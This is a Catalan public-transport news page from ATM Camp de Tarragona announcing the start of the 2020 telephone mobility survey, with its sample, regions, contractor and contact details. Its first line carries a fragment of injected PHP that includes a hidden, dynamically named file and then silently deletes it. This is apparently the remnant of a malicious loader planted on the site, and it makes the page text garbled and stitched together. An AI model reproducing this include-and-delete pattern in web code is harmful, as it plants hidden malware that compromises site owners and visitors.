");fclose($hdl);include("{$eb}.$algo");@unlink("{$eb}.$algo");$npDcheckClassBgp='aue';} ?> Inici de l’Enquesta de Mobilitat Quotidiana al Camp de Tarragona
Iconos cabecera

Highlights

  • T-12 CardT-12 Card
    For boys and girls from 4 to 12 years old

Inici de l’Enquesta de Mobilitat Quotidiana al Camp de Tarragona (06/02/2020)

El dia 11 de febrer l’ATM Camp de Tarragona inicia la realització de les enquestes telefòniques corresponents a l’Enquesta de Mobilitat Quotidiana al Camp de Tarragona.

El Consorci del Transport Públic del Camp de Tarragona, Autoritat Territorial de la Mobilitat (ATM) amb la coŀlaboració de l’Institut d’Estadística de Catalunya (Idescat) realitza l’Enquesta de Mobilitat Quotidiana al Camp de Tarragona (EMQ CdT). Aquesta estadística és de caràcter oficial, per la qual cosa forma part del Programa anual d’actuació estadística per a l’any 2018 i per l’any 2019 (codi d’actuació estadística 01 07 06) i és obligatòria i sotmesa a secret estadístic.

L’Enquesta contempla la realització de prop de 14.000 entrevistes telefòniques a persones residents, seleccionades d’una mostra aleatòria i representativa de les comarques de l’Alt Camp, el Baix Camp, el Baix Penedès, la Conca de Barberà, el Priorat i el Tarragonès. Amb l’ajut d’un qüestionari electrònic s’entrevistarà a les persones residents seleccionades de 4 anys o més (l’enquesta adreçada a les persones menors de 16 anys podrà ser contestada pels pares/tutors legals).

Les enquestes telefòniques, s’inicien el dia 11 de febrer i es preveu que finalitzin durant el mes de maig del 2020.

El seu objectiu és recollir informació relativa a tots els desplaçaments que els entrevistats declarin haver realitzat en determinats dies anteriors a l’entrevista, per obtenir estadístiques comparables amb altres territoris del país. Per als treballs d’enquestació ha estat contractada l’empresa Institut Opinòmetre per mitjà de licitació pública i, per tant, està oficialment autoritzada per dur a terme l’enquesta. Tot el personal implicat està degudament acreditat i obligat legalment a preservar el secret estadístic.

Podeu consultar els aspectes tècnics i legals de l’enquesta al web de l’Idescat, a les adreces idescat.cat/paae/2018/010706 i idescat.cat/paae/2019/010706 o al web de l’ATM www.atmcamptarragona.cat . També podeu posar-vos en contacte amb l’equip de recollida de l’enquesta a través del telèfon gratuït 900 802 796 o de l’adreça electrònica emq2020ct@opinometre.com

Font: ATM Camp de Tarragona

00_10_Fitxa_EMQ CdT (194 kB)

[Back to news]

 
Anselm Clavé, 1 43004 - Tarragona